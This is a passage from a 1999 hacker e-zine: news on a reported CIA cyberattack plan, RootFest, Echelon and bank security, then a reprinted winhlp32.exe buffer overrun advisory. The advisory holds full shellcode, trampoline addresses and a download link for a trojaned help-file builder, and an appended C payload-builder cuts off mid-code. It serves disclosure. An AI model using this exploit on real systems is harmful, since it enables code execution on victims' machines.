had begun making progress on a peace agreement? 
The White House declined to comment on the finding, and NEWSWEEK does not have access to the entire document. But some intelligence officials with knowledge of its contents worry that the finding was put together too hastily, and that the potential consequences haven't been fully thought out. "If they pull it off, it will be great," says one government cyberwar expert. "If they screw it up, they are going to be in a world of trouble." By far the most controversial—and probably most difficult—part of the operation would be the effort to hack into Milosevic's foreign bank accounts. Intelligence sources believe they have identified banks in several countries, including Russia, Greece and Cyprus, where the Serb leader has hidden millions of dollars. But the Hollywood vision of a brainy nerd draining bank accounts from his computer at CIA headquarters is a fantasy. According to government intelligence experts, agents would have to visit each of the banks, set up new accounts, then carefully watch how the institution operates and look for weak links in its security. The National Security Agency's hackers would use that information to try to overcome today's sophisticated encryption software and fire walls. If they gained access, the hackers could do almost anything they liked with Milosevic's cash—steal it, move it to a dummy account or slowly drain it away a few thousand dollars at a time. But should they? The idea of a U.S.-sponsored plan to break into foreign banks unnerves some intelligence officials, who point out that the operation would be a breach of national sovereignty in friendly countries and open the door to computer attacks on U.S. banks. What's more, the United States would be the main loser if confidence in the world banking system were undermined. The sabotage plan also entails some serious problems. 
The CIA would somehow have to find and train guerrillas without helping
the Kosovo Liberation Army, which the administration itself labeled a
terrorist organization just a year ago and which is believed to fund its
operations with profits from international drug smuggling. In the chaos
now prevailing in Kosovar refugee camps it will not be easy for the CIA to
make sure the anti-Milosevic rebels it signs up have no KLA ties.
Intelligence officials also worry it would be difficult to control the
U.S.-trained rebels once boot camp is over and they are set loose on
Milosevic. "I'm afraid they could use their training to carry out
atrocities," says John Rothrock, the Air Force's former chief of
intelligence planning. "If they think they can rein them in, it's
tremendous naiveté."

Congress can complain all it likes, but it has no legal authority to stop
the finding. Lawmakers can try to block the plan by refusing to provide
money for the covert action, but the president can tap into his emergency
funds to finance it. At this point, it is not at all certain that the
finding will ultimately be carried out. If the grumblings from the Hill
and the intelligence community grow too loud, or if the risk-averse CIA
chooses to drag its feet, the president may opt to quietly kill the
finding—and pretend it never existed.

Newsweek, May 31, 1999

@HWA

03.1 More on the Cyberwar
~~~~~~~~~~~~~~~~~~~~

Contributed by Twstdpair (Source: MSNBC)

Cyberwar? The U.S. stands to lose
Experts argue plan to raid Milosevic's bank accounts would do more harm
than good

May 28 - It sounded like a Tom Clancy spy novel. Newsweek reported last
week that the CIA was planning to tinker with international bank accounts
full of Slobodan Milosevic's money - just another way of getting under the
Yugoslav president's skin. Information warfare experts disagree about the
feasibility of such a cyberattack. But there's little disagreement the U.S.
stands to lose much more than it might gain from firing the first volley
in such an information war. In fact, some believe damage has already been
done.

THE NEWSWEEK STORY RAISED several issues: What international laws would
govern a U.S.-backed attack on a bank in a third-party nation? Is such an
attack feasible in the first place? What kind of retaliation might U.S.
citizens, and their bank accounts, face? But most important, what does
even the possibility of such an attack do to the integrity of
international banking systems?

The story on the cyberattack - fact, fiction or somewhere in between -
could already have put the U.S. at risk, said Kawika M. Dajuio, executive
vice president of the Financial Information Protection Association.
Banking systems hinge on public confidence. You put the money in; you're
confident you'll be able to take the money out. If there's any hint you
might not be able to get at your money, you'd withdraw it. Any attack on
the integrity of a banking system anywhere - particularly when retaliation
seems like such an obvious possibility - chips away at public confidence.

"It bothers me because we have had conversations with the defense and
intelligence community. We thought this was off the table," Dajuio said.
"We've had discussions with rather senior policy-makers. We thought they
understood the importance of protecting public confidence in the payment
system."

But retaliation by foreign agents might be just one source of insecurity
for U.S. account holders. There's another: If the government can and is
willing to tinker with foreign accounts, what will stop it from tinkering
with mine?

COULD IT BE DONE?

Could U.S. agents hijack Milosevic's money, allegedly stashed away in
foreign banks? Yes and no. Experts agree that the CIA has had the know-how
to control bank accounts for years, through old-fashioned non-cyber
methods, such as coercing bank authorities, or even through legal methods
such as freezing accounts.
On the other hand, it's not easy when the target knows what's coming.
According to MSNBC analyst Bill Arkin, the international community,
including UNSCOM, is still trying to get its hands on Saddam Hussein's
assets.

And such real-world tactics are a far cry from the cyberwar image of a few
CIA hackers sitting at a keyboard moving around money thanks to an
Internet connection and some wits. There's disagreement about how possible
that might be.

"The audits we have performed tell us [banks] are not invulnerable," says
a security expert identifying himself as Space Rogue. Rogue works at L0pht
Heavy Industries, which hires out to hack corporate computer systems to
test their vulnerability. "Banks have a little more security in place, but
that security is still not at a level where it's unbreakable." While money
systems aren't connected to the public Internet, "sometimes they have a
modem dangling off for remote access, or they use cryptography, but not
correctly," he said.

Others suggest cracking a bank that holds Milosevic money - outside the
more traditional methods - is nearly impossible. "I deal in probabilities,
and I've never seen it," said a man identifying himself as Louis Cipher, a
principal investor in Infowar.com. Cipher is also in charge of security at
what he says is the "sixth-largest brokerage in America." He suggested
very few individuals have the skills necessary to "tunnel" from an
Internet connection through mainframe systems in banks - in fact, a team
of specialists and inside information would be required. "You'd have to be
an applications specialist to even navigate to a screen," he said. "You're
talking well beyond the skills of hackers. It would have to be an insider
working with Job Control Language sitting on the mainframe. The only one
who would have that ability other than the U.S. government would be
organized crime."

And Cipher is skeptical about the U.S.
government's ability to hire and hold the brightest minds in the security
industry - since no government agency can match the lure of stock options
offered by a high-tech firm.

Still, even the possibility of the U.S. using a wired computer to move
Milosevic's money drew swift reaction from information warfare observers.
Even hacker groups protested the notion, with a hacker calling himself
"sixtoed" setting up a Web page in protest. The reason: Since the U.S.
relies more on technology and information than any other nation, it
stands to lose the most from such a cyberwar.

"I am not one for an information arms race," said Frank Cilluffo, senior
analyst at the Center for Strategic and International Studies in
Washington. "We will lose that race.... We're a hell of a lot more
susceptible to retaliation. The defensive implications outweigh the
offensive implications."

Anyone can build up an information warfare capability, Cilluffo said. And
it's much more like guerrilla war than nuclear war - it's easy for the
enemy to hide, and there's no real deterrent. Therefore, retaliation could
be swift and indiscriminate. In addition, there is a general principle
among security experts suggesting once a system's security is
compromised, it's much easier to compromise a second time. So the U.S.
could very well be paving the way for retribution.

WHY NO DENIALS?

Fear of such retaliation attempts, or even the perception of such
retaliation attempts, drove Dajuio to start calling his friends in the
intelligence community to complain as soon as the Newsweek story hit. He
has yet to receive the reassurance he was hoping for. "If it's true or
it's just leaks, it's bad to have the story out there," Dajuio said. "I
have yet to have anyone tell me 'Don't worry, everything's OK.' ... If
they haven't done anything, the most appropriate thing to do is to come
out and say they're not doing it."
The CIA isn't doing that; a spokesperson told MSNBC the agency couldn't
comment on its activities, but one source familiar with U.S. intelligence
capabilities tells MSNBC to be "very skeptical" of the Newsweek story.

Meanwhile, opening the Pandora's box of cyberwar would lead to a series of
yet-to-be answered questions. International law isn't ready to handle such
conflicts, says Cilluffo - so if the U.S. broke into a bank in Cyprus,
what laws would govern that act? And could the compromised bank sue the
U.S. government?

"What are the rules of engagement here?" Cilluffo asked. "What is game,
what is not game? This may be a harbinger of how we prosecute and wage war
in the future."

@HWA

04.0 RootFest Scares Officials In Minneapolis
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/
contributed by erewhon

The hacker convention RootFest was held in Minneapolis over the weekend.
Evidently this scared the local authorities enough to shut down several
vulnerable points in its computer network. The city responded to the three
day hacker convention by shutting down some older dial-up modem lines.
(Wonder if they will come back online afterwards?) Other reports also
indicate that the Minneapolis City Police also shut down its computer
network over the weekend.

APB Online
http://www.apbonline.com/911/1999/05/21/hackers0521_01.html
WCCO Channel 4
http://www.wcco.com/news/stories/news-990521-184737.html
RootFest
http://www.rootfest.org
City of Minneapolis Action Plan
http://www.rootfest.org/Press/park.txt

APB Online:

HACKERS WORRY MINNEAPOLIS OFFICIALS
City Secures Its Computers as Conference Comes to Town

May 21, 1999
By Hans H. Chen

MINNEAPOLIS (APBNews.com) -- The arrival of several hundred computer
hackers this weekend has prompted the city to shut down several vulnerable
points in its computer network.
While the city's computer guru called the weekend shutdown "an opportunity
to remind ourselves of network-based security," the conference organizer
called the measures "an overly paranoid precaution."

The hackers descended today on the Minneapolis Convention Center for
RootFest 99, a three-day discussion of computer security open to "the
computer underground, hackers, IT professionals, government agents, feds,"
according to the conference's Web site. The conference features sessions
entitled "Circumventing Internet Censorship," and "Internet Security in
Europe: State of Affairs." Speakers include both hackers and computer
security consultants.

City downplays concerns

But the city responded to the event by closing off some older dial-up
modem lines that a few telecommuting employees and remote city agencies
still use to connect into the city's network.

Don Saelens, the city's information technology manager, downplayed
concerns about possible hacking attempts. The conference, Saelens said,
presented "an opportunity to remind ourselves of network-based security."

But Saelens did admit that the timing of the system shutdown was not
wholly coincidental. "We've been doing a number of upgrades on our own
networks, and these were all slated to go out anyway this year," Saelens
said. "I have to admit, [this conference] was a reminder of network
security that heightened the awareness."

Police reportedly shut down

In addition, the Minneapolis Star Tribune reported that the city Police
Department shut down its computer network over the weekend. Saelens and a
police official refused to confirm the report, citing safety concerns.
"The only thing the police is saying is we are not releasing anything we
are doing for security reasons," said Penny Parrish, a police department
spokeswoman.

'Hacker threat'?

Chris Lothos, an organizer of RootFest, attacked the city's measures in a
dispatch on the RootFest Web site.
"It's an overly paranoid precaution taken for the 'hacker threat' that
RootFest supposedly poses to the world at large," Lothos wrote.

The conference also printed on its Web site a copy of the e-mail memo
Saelens sent to city employees alerting them to the security measures.
Saelens said he's not sure how the group got a copy of his e-mail.

>Subject: FW: NOTICE TO ALL PARK BOARD COMPUTER USERS regarding Hacker
>Conference this weekend
>Importance: High
>
>Minneapolis Park and Recreation ITS Hacker conference action plan:
>
> In response to the City's action plan noted below, Park Board ITS
>will be disabling the Park Board's Email services Friday evening, May 21st
>through Monday morning, May 24th. Park Board users will not have access
>at all to their Park Board Email accounts during this time.
>
>In addition - Dial-In (Reachout) services will be disabled Thursday
>evening, May 20th beginning at 8:00pm through Monday morning, May 24th.
>The Minneapolis rec centers and other remote users will not be able to
>access their Reachout accounts during this time. Remote PEIRS users
>entering time are advised to do so by Thursday evening, May 20th by
>8:00pm.
>PEIRS users downtown, at the SSSC, or on frame-relay (golf courses) will
>be able to enter in time as usual.
>
>If you have questions, please contact the Park Board Help Desk at
>661-XXXX. Thank you for your cooperation.
>
>Larry Brandts
>Park Board ITS Manager
>
>
>-----Original Message-----
>From: XXXXXXXXXXX Sent: Wednesday, May 19, 1999 10:35 AM
>To: All Exchange Users
>Subject: NOTICE TO ALL CITY COMPUTER USERS
>
>To all City Staff,
>RootFest '99, a convention of so-called computer "hackers" will be meeting
>in Minneapolis this weekend, May 21-23. You may have read news stories
>about individuals (hackers) who have used their computer programming
>skills to gain unauthorized access (hack) into computer networks of
>government agencies, businesses, banks, or other high-profile
>organizations.
>Sometimes, these individuals hack into computers to
>perform fairly harmless computer pranks. However, that is not always the
>case. Hackers can also infect entire computer networks with disabling
>viruses.
>
>As a precautionary measure, we are reminding you of safe computing
>practices that should already be followed, as well as some additional
>steps we will be taking to protect the City from any unauthorized access
>to our network. To be successful, we will need the active participation
>of all City staff.
>
>1. Employees must turn off their computer terminals at the close of
>business each night.
>
>2. Those who have an individual analog phone line and modem should be
>turning off the modem every night. There are very few of these individual
>analog lines and modems left in the City, and they are being phased out
>because of their risk to network security. Anyone who has one of the new
>City image pc's does not have worry about this issue, as they are using
>the new City standard for remote access. If you have not had a line/modem
>installed, you do not need to do anything except turn off your pc.
>
>3. Employees will not have access to their City email accounts at all
>beginning Friday evening through Monday morning. There will not be access
>to email outside of the City from Thursday evening through Monday morning.
>
>4. Access to the City's network from outside locations will be
>temporarily cancelled Thursday evening through Monday morning. This will
>not impact the majority of staff members, but as an example, if you can
>currently check your City email account from home, you will not be able to
>do so during that timeframe.
>
>Employees who will be at work over the weekend will have access to Insite,
>the City's intranet, as well as the Internet.
>
>While I do not believe the City will be a target for these individuals,
>it is a prudent business decision to follow these simple safety precautions.
>If you have questions regarding any of these steps, please contact Wanda
>Forsythe, in ITS Security. Her number is 673-XXXX.
>
>Thank you for your attention to this matter.
>
>- Don Saelens
>
>* * * * * * *
>Sara Dietrich, Communications Department
>673-XXX; 673-XXXX (fax)

@HWA

05.0 Australia Admits to Echelon
~~~~~~~~~~~~~~~~~~~~~~~~~~~

from HNN http://www.hackernews.com/
contributed by erewhon

Martin Brady, director of the Defense Signals Directorate in Canberra
Australia has admitted that his country does participate in a secret spy
organization known as UKUSA. This organization works with the intelligence
agencies of Australia, Canada, New Zealand, the UK and the USA to
intercept every fax, telex, e-mail, phone call, or computer data that is
carried via commercial satellite communications. This global eavesdropping
is known as Echelon.

The Age
http://www.theage.com.au/daily/990523/news/news3.html

The Age;

Careful, they might hear you
By DUNCAN CAMPBELL

Australia has become the first country openly to admit that it takes part
in a global electronic surveillance system that intercepts the private and
commercial international communications of citizens and companies from its
own and other countries.

The disclosure is made today in Channel 9's Sunday program by Martin
Brady, director of the Defence Signals Directorate in Canberra. Mr Brady's
decision to break ranks and officially admit the existence of a hitherto
unacknowledged spying organisation called UKUSA is likely to irritate his
British and American counterparts, who have spent the past 50 years trying
to prevent their own citizens from learning anything about them or their
business of ``signals intelligence'' - ``sigint'' for short.

In his letter to Channel 9 published today, Mr Brady states that the
Defence Signals Directorate (DSD) ``does cooperate with counterpart
signals intelligence organisations overseas under the UKUSA relationship".
In other statements which have now been made publicly available on the Internet (www.dsd.gov.au), he also says that DSD's purpose ``is to support Australian Government decision-makers and the Australian Defence Force with high-quality foreign signals intelligence products and services. DSD (provides) important information that is not available from open sources". Together with the giant American National Security Agency (NSA) and its Canadian, British, and New Zealand counterparts, DSD operates a network of giant, highly automated tracking stations that illicitly pick up commercial satellite communications and examine every fax, telex, e-mail, phone call, or computer data message that the satellites carry. The five signals intelligence agencies form the UKUSA pact. They are bound together by a secret agreement signed in 1947 or 1948. Although its precise terms have never been revealed, the UKUSA agreement provides for sharing facilities, staff, methods, tasks and product between the participating governments. Now, due to a fast-growing UKUSA system called Echelon, millions of messages are automatically intercepted every hour, and checked according to criteria supplied by intelligence agencies and governments in all five UKUSA countries. The intercepted signals are passed through a computer system called the Dictionary, which checks each new message or call against thousands of ``collection'' requirements. The Dictionaries then send the messages into the spy agencies' equivalent of the Internet, making them accessible all over the world. Australia's main contribution to this system is an ultra-modern intelligence base at Kojarena, near Geraldton in Western Australia. The station was built in the early 1990s. At Kojarena, four satellite tracking dishes intercept Indian and Pacific Ocean communications satellites. The exact target of each dish is concealed by placing them inside golfball like ``radomes''. 
About 80 per cent of the messages intercepted at Kojarena are sent automatically from its Dictionary computer to the CIA or the NSA, without ever being seen or read in Australia. Although it is under Australian command, the station - like its controversial counterpart at Pine Gap - employs American and British staff in key posts. Among the ``collection requirements" that the Kojarena Dictionary is told to look for are North Korean economic, diplomatic and military messages and data, Japanese trade ministry plans, and Pakistani developments in nuclear weapons technology and testing. In return, Australia can ask for information collected at other Echelon stations to be sent to Canberra. A second and larger, although not so technologically sophisticated DSD satellite station, has been built at Shoal Bay, Northern Territory. At Shoal Bay, nine satellite tracking dishes are locked into regional communications satellites, including systems covering Indonesia and south-west Asia. International and governmental concern about the UKUSA Echelon system has grown dramatically since 1996, when New Zealand writer Nicky Hager revealed intimate details of how it operated. New Zealand runs an Echelon satellite interception site at Waihopai, near Blenheim, South Island. Codenamed ``Flintlock", the Waihopai station is half the size of Kojarena and its sister NSA base at Yakima, Washington, which also covers Pacific rim states. Waihopai's task is to monitor two Pacific communications satellites, and intercept all communications from and between the South Pacific islands. Like other Echelon stations, the Waihopai installation is protected by electrified fences, intruder detectors and infra-red cameras. A year after publishing his book, Hager and New Zealand TV reporter John Campbell mounted a daring raid on Waihopai, carrying a TV camera and a stepladder. From open, high windows, they then filmed into and inside its operations centre. 
They were astonished to see that it operated completely automatically.
Although Australia's DSD does not use the term ``Echelon'', Government
sources have confirmed to Channel 9 that Hager's description of the system
is correct, and that Australia's Dictionary computer at Kojarena works in
the same way as the one in New Zealand.

Until this year, the US Government has tried to ignore the row over
Echelon by refusing to admit its existence. The Australian disclosures
today make this position untenable. US intelligence writer Dr Jeff
Richelson has also obtained documents under the US Freedom of Information
Act, showing that a US Navy-run satellite receiving station at Sugar
Grove, West Virginia, is an Echelon site, and that it collects
intelligence from civilian satellites. The station, south-west of
Washington, lies in a remote area of the Shenandoah Mountains. According
to the released US documents, the station's job is ``to maintain and
operate an Echelon site''. Other Echelon stations are at Sabana Seca,
Puerto Rico, Leitrim, Canada and at Morwenstow and London in Britain.

Information is also fed into the Echelon system from taps on the Internet,
and by means of monitoring pods which are placed on undersea cables. Since
1971, the US has used specially converted nuclear submarines to attach
tapping pods to deep underwater cables around the world.

The Australian Government's decision to be open about the UKUSA pact and
the Echelon spy system has been motivated partly by the need to respond to
the growing international concern about economic intelligence gathering,
and partly by DSD's desire to reassure Australians that its domestic
spying activity is strictly limited and tightly supervised. According to
DSD director Martin Brady, ``to ensure that (our) activities do not
impinge on the privacy of Australians, DSD operates under a detailed
classified directive approved by Cabinet and known as the Rules on Sigint
and Australian Persons".
Compliance with this Cabinet directive is monitored by the inspector-general of security and intelligence, Mr Bill Blick. He says that ``Australian citizens can complain to my office about the actions of DSD. And if they do so then I have the right to conduct an inquiry." But the Cabinet has ruled that Australians' international calls, faxes or e-mails can be monitored by NSA or DSD in specified circumstances. These include ``the commission of a serious criminal offence; a threat to the life or safety of an Australian; or where an Australian is acting as the agent of a foreign power". Mr Brady says that he must be given specific approval in every case. But deliberate interception of domestic calls in Australia should be left to the police or ASIO. Mr Brady claims that other UKUSA nations have to follow Australia's lead, and not record their communications unless Australia has decided that this is required. ``Both DSD and its counterparts operate internal procedures to satisfy themselves that their national interests and policies are respected by the others," he says. So if NSA happens to intercept a message from an Australian citizen or company whom DSD has decided to leave alone, they are supposed to strike out the name and insert ``Australian national'' or ``Australian corporation'' instead. Or they must destroy the intercept. That's the theory, but specialists differ. According to Mr Hager, junior members of UKUSA just can't say ``no''. ``... When you're a junior ally like Australia or New Zealand, you never refuse what they ask for.'' There are also worries about what allies might get up to with information that Australia gives them. When Britain was trying to see through its highly controversial deal to sell Hawk fighters and other arms to Indonesia, staff at the Office of National Assessments feared that the British would pass DSD intelligence on East Timor to President Soeharto in order to win the lucrative contract. 
The Australian Government does not deny that DSD and its UKUSA partners are told to collect economic and commercial intelligence. Australia, like the US, thinks this is especially justified if other countries or their exporters are perceived to be behaving unfairly. Britain recognises no restraint on economic intelligence gathering. Neither does France. According to the former Canadian agent Mike Frost, it would be ``naïve" for Australians to think that the Americans were not exploiting stations like Kojarena for economic intelligence purposes. ``They have been doing it for years," he says. ``Now that the Cold War is over, the focus is towards economic intelligence. Never ever over-exaggerate the power that these organisations have to abuse a system such as Echelon. Don't think it can't happen in Australia. It does.''

@HWA

06.0 Banks to Test Home User PC Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

from HNN http://www.hackernews.com/
contributed by Weld Pond

Worried that consumers' PCs may be vulnerable to attack, a consortium of the 15 largest US banks plans to open a lab to test PC hardware and software. The Banking Industry Technology Secretariat plans to open the lab this summer. (It's about time they started looking into this. Applications like Back Orifice have been around for what? Over a year now? Sounds like someone is just covering their ass.)

C|Net http://www.news.com/News/Item/0,4,0-36923,00.html?st.ne.ni.lh

Big banks move on Net security
By Tim Clark
Staff Writer, CNET News.com
May 21, 1999, 1:00 p.m. PT

Worried that problems on home computers may make Internet banking insecure, a group of major U.S. banks is expected to unveil a plan this summer to open a lab to test the security of Web browsers and PC hardware and software.
"The banks feel that firewalls and what they have internally is in great shape, but the link is to the consumer and PC environments [where they find security more suspect]," said Catherine Allen, chief executive of the Banking Industry Technology Secretariat, a division of Bankers Roundtable. BITS is governed by a board of CEOs of the 15 largest U.S. banks, including familiar names like Citibank, Chase Manhattan, Mellon Bank, Wells Fargo, and Bank of America. Edward Crutchfield, First Union chief executive, chairs BITS, a two-year-old group that focuses on technology issues affecting the U.S. banking system. The BITS Security/Technology Lab, to be run by a new banking-oriented division of government contractor SAIC, is due to be announced in late June or early July, with vice president Al Gore and former U.S. Sen. Sam Nunn invited to speak. A July meeting is planned in the San Francisco area to explain the program to hardware and software vendors. Security experts from major banks are currently drafting the testing criteria. In addition, the lab oversight group is working with the President's Commission on Critical Infrastructure Protection on ways to protect the nation's financial infrastructure from attacks by terrorist or organized criminal groups. President Clinton formed that group a year ago after a report on threats from cyber-terrorists. The effort also will involve information sharing among banks to ward off organized attacks, including use of neural networking and other technologies to detect and predict patterns of attacks. "If it's a terrorist or major criminal activity, we think it will happen in multiple places," Allen said. "They won't hit just one bank but many." Security planners worry that assaults could be mounted near the end of this year, when attackers hope banks might be distracted by the Y2K turnover. 
The testing of consumer devices and software will be coupled with educational campaigns urging users to use antivirus software and take other precautions to avoid security problems. Systems that pass the tests can use a special logo in their marketing to signify the products have been deemed safe by BITS. Also to be tested are systems to conduct financial transactions, including personal financial software, online billing and bill-paying packages, and smart cards. "Vendors want this as much as we do," Allen contended, saying that today vendors may get multiple requests from different banks to make specific changes for that bank's use. Funneling through the BITS lab would simplify that process. The effort comes as financial institutions are beginning to use the Internet for online banking, stock trading, and other transactions. In the past, online consumer transactions have been routed over private networks that banks regard as more secure. But the explosion of the Internet, which is not such a controlled or secure environment, has bankers looking for safety. Another reflection of that concern has been the efforts by Visa and MasterCard, on behalf of their bank owners, to push the Secure Electronic Transaction (SET) protocol for Internet credit card purchases. Although SET has not been widely adopted in the U.S., the prolonged push to implement it mirrors bankers' worries about their reputation as trusted institutions. But there's a financial implication too. Banks are heavily regulated, and they are required to reimburse their customers for any losses suffered because of security breaches in online financial transactions. As online banking grows, that could become a big liability.

@HWA

07.0 EMPEROR VIRUS
~~~~~~~~~~~~~

From http://www.net-security.org/
by BHZ, Tuesday 25th May 1999 on 4.46 pm CET

AVP announced a new clone of the Chernobyl virus named Emperor.
The Emperor virus carries additional code that lets it infect more systems by copying itself to more areas of the computer, so it can spread further. It infects DOS (16-bit) COM and EXE programs and overwrites the Master Boot Record of the hard drive and the boot sector of floppy diskettes.

08.0 WINHLP32.EXE BUFFER OVERRUN
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by BHZ, Tuesday 25th May 1999 on 1.01 am CET

David Litchfield aka Mnemonix wrote an advisory on a buffer overrun in winhlp32.exe. "The buffer overrun in winhlp32.exe occurs when it attempts to read a cnt file with an overly long heading string. If the string is longer than 507 bytes the buffer overrun does not occur - winhlp32 just truncates the entry." Read the advisory below.

Analysis of the winhlp32.exe buffer overrun.

The buffer overrun in winhlp32.exe occurs when it attempts to read a .cnt (help contents) file with an overly long heading string. If the string is longer than 507 bytes the buffer overrun does not occur - winhlp32 just truncates the entry. The return address is overwritten with bytes 357, 358, 359 and 360. Everything before these bytes is lost, giving us bytes 361 to 507 to play with - a total of 147 bytes for our exploit code. On playing around with the overrun we find we lose about another 20 of these bytes, giving us only 127 bytes to play with - not a lot really. On overrunning the buffer and analysing the contents of memory and the CPU's registers with a debugger we find that byte 361 is found at 0x0012F0E4. This is the address we need the processor to fetch its next instruction from - but this address has a NULL in it, which totally messes things up: the heading is handled as a string, so a zero byte would cut our payload short. However, looking at the registers we can see that ESP, the stack pointer, holds this address, so if we can find somewhere in memory that does a JMP ESP, and set the return address to that, then we should be able to get back to the address where we'll place our exploit code.
Looking at the DLLs that winhlp32.exe uses we find that kernel32.dll has a JMP ESP instruction at 0x77F327E5 (Service Pack 4's version of kernel32.dll - I think it's at 0x77F327D5 in Service Pack 3's kernel32.dll). So we put 0x77F327E5 into bytes 357 to 360, but we have to load it in reverse (little-endian) byte order, so byte 357 we'll set to 0xE5, byte 358 to 0x27, byte 359 to 0xF3 and byte 360 to 0x77. Now that we've jumped back to our exploit code we have to decide what we want to put in it. Because we only have 127 bytes, to do anything meaningful we need to start another program - the best thing is to get it to run a batch file. This means calling the system() function, which is exported by msvcrt.dll, which isn't loaded into the address space of winhlp32.exe - so we'll have to load it. How do we do this? We have to call LoadLibrary(), which is exported by kernel32.dll, which is in the address space. LoadLibraryA() is exported at address 0x77F1381A, so all we need to do is have the string "msvcrt.dll" in memory somewhere and call 0x77F1381A with a pointer to the null-terminated "msvcrt.dll" string. Because it has to be null terminated we'll get our code to write it into memory. Once this is done we'll place the address of LoadLibraryA() onto the stack, then place the address of the "msvcrt.dll" string, and finally call LoadLibraryA() using an offset from EBP.
The following is the assembly code needed to do this:

    /* First the procedure prologue */
    push ebp
    mov ebp,esp
    /* Now we need some zeroes */
    xor eax,eax
    /* and then push them onto the stack */
    push eax
    push eax
    push eax
    /* Now we write MSVCRT.DLL onto the stack */
    mov byte ptr[ebp-0Ch],4Dh
    mov byte ptr[ebp-0Bh],53h
    mov byte ptr[ebp-0Ah],56h
    mov byte ptr[ebp-09h],43h
    mov byte ptr[ebp-08h],52h
    mov byte ptr[ebp-07h],54h
    mov byte ptr[ebp-06h],2Eh
    mov byte ptr[ebp-05h],44h
    mov byte ptr[ebp-04h],4Ch
    mov byte ptr[ebp-03h],4Ch
    /* move the address of LoadLibraryA() into the edx register */
    mov edx,0x77F1381A
    /* and then push it onto the stack */
    push edx
    /* Then we load the address where the msvcrt.dll string can be found */
    lea eax,[ebp-0Ch]
    /* and push it onto the stack */
    push eax
    /* Finally we call LoadLibraryA() */
    call dword ptr[ebp-10h]

All things going well we should now have loaded msvcrt.dll into the address space of winhlp32.exe. With this in place we now need to call system() and provide the name of a batch file to it as an argument. We don't have enough bytes to play with to call GetProcAddress() and still do the rest of the things we have to do, like clean up, so we check what version of msvcrt.dll we have before writing the code and see where system() is exported. On a standard install of Windows NT this will normally be version 4.20.6201 with system() exported at 0x7801E1E1. We'll call the batch file ADD.bat, but to save room we won't give it an extension. The system() function will try the default executable extensions like .exe, .com and .bat, find it for us and then run it. Once it has run, the cmd.exe process system() launched will exit. So we need to have the null-terminated string "ADD" in memory and the address of system().
Below is the code that will write "ADD" onto the stack and then call system():

    /* First the procedure prologue */
    push ebp
    mov ebp,esp
    /* We need a NULL, so zero a register and push it onto the stack */
    xor edi,edi
    push edi
    /* Now we write ADD onto the stack */
    mov byte ptr [ebp-04h],41h
    mov byte ptr [ebp-03h],44h
    mov byte ptr [ebp-02h],44h
    /* Place the address of system() into eax and push it onto the stack */
    mov eax, 0x7801E1E1
    push eax
    /* Now load eax with the address of ADD and push this too */
    lea eax,[ebp-04h]
    push eax
    /* Then we call system() */
    call dword ptr [ebp-08h]

Once the batch file has been run the command interpreter will exit, and if we don't clean up after ourselves winhlp32.exe will access violate, so we need to call exit(0) to keep it quiet. exit() is also exported by msvcrt.dll, at address 0x78005BBA - which has a null in it. It's not a major problem - we can fill a register with 0xFFFFFFFF and subtract 0x87FFA445 from it. The following code calls exit(0):

    /* Procedure prologue */
    push ebp
    mov ebp,esp
    /* Round about way of getting the address of exit() into edx */
    mov edx,0xFFFFFFFF
    sub edx,0x87FFA445
    /* Push this address onto the stack */
    push edx
    /* Get some nulls - this is our exit code - and push them too */
    xor eax,eax
    push eax
    /* then call exit()! */
    call dword ptr[ebp-04h]

Altogether our code looks like this:

    push ebp
    mov ebp,esp
    xor eax,eax
    push eax
    push eax
    push eax
    mov byte ptr[ebp-0Ch],4Dh
    mov byte ptr[ebp-0Bh],53h
    mov byte ptr[ebp-0Ah],56h
    mov byte ptr[ebp-09h],43h
    mov byte ptr[ebp-08h],52h
    mov byte ptr[ebp-07h],54h
    mov byte ptr[ebp-06h],2Eh
    mov byte ptr[ebp-05h],44h
    mov byte ptr[ebp-04h],4Ch
    mov byte ptr[ebp-03h],4Ch
    mov edx,0x77F1381A
    push edx
    lea eax,[ebp-0Ch]
    push eax
    call dword ptr[ebp-10h]
    push ebp
    mov ebp,esp
    xor edi,edi
    push edi
    mov byte ptr [ebp-04h],41h
    mov byte ptr [ebp-03h],44h
    mov byte ptr [ebp-02h],44h
    mov eax, 0x7801E1E1
    push eax
    lea eax,[ebp-04h]
    push eax
    call dword ptr [ebp-08h]
    push ebp
    mov ebp,esp
    mov edx,0xFFFFFFFF
    sub edx,0x87FFA445
    push edx
    xor eax,eax
    push eax
    call dword ptr[ebp-04h]

Now we need the operation codes (opcodes) for all this, which we get by writing a program that uses the __asm keyword and then debugging it. This is what we actually load into our exploit code. Following is the source of a program that will create a "trojaned" wordpad.cnt. It will also create a batch file called add.bat - edit it as you see fit. I have compiled the program - you can get a copy of it from http://www.infowar.co.uk/mnemonix/winhlpadd.exe Note that this will run only on standard installs of NT with Service Pack 4 and expects an msvcrt.dll version of 4.20.6201 - run it from the winnt\help directory. Note also that the opcode string in the source below does not use the 0x7801E1E1 and 0x78005BBA addresses from the walk-through: it moves 0x77A0E1E1 into eax for system() and 0x779F5BBA into edx for exit() (the same two exports with msvcrt.dll based 0x610000 lower; neither contains a zero byte, so the 0xFFFFFFFF subtraction trick is not needed there), and the program's banner names msvcrt.dll version 4.00.6201. Those values are tied to one particular msvcrt.dll build, so check the export addresses with a debugger on the target before expecting the payload to work.
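The walk-through above fixes a layout (filler, the return address at bytes 357-360 in reversed byte order, then up to 127 bytes of code), needs a JMP ESP somewhere in an always-mapped DLL, and works around a zero byte in the exit() address with the 0xFFFFFFFF-minus-k trick. The following C program is an added example, not part of Litchfield's advisory or his winhlpadd source: it assembles a heading of that shape, refuses one that exceeds 507 bytes or contains a zero byte, computes the null-free subtrahend for any address, and scans a byte buffer for the FF E4 opcode pair of JMP ESP. The addresses 0x77F327E5 and 0x78005BBA are the advisory's; the six-byte "DLL image" it scans and the 0xCC filler standing in for shellcode are constructed here.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout constraints stated in the advisory for the winhlp32.exe heading. */
#define RET_OFFSET  356   /* bytes 357-360 (1-based) overwrite the saved return address */
#define MAX_HEADING 507   /* longer headings are truncated, so no overrun happens */

/* JMP ESP is the opcode pair FF E4. Returns the offset of its first occurrence
 * in buf, or -1. On a real target buf is the mapped image of a DLL that always
 * loads at the same base (kernel32.dll in the advisory); base + offset is the
 * trampoline address to put in bytes 357-360. */
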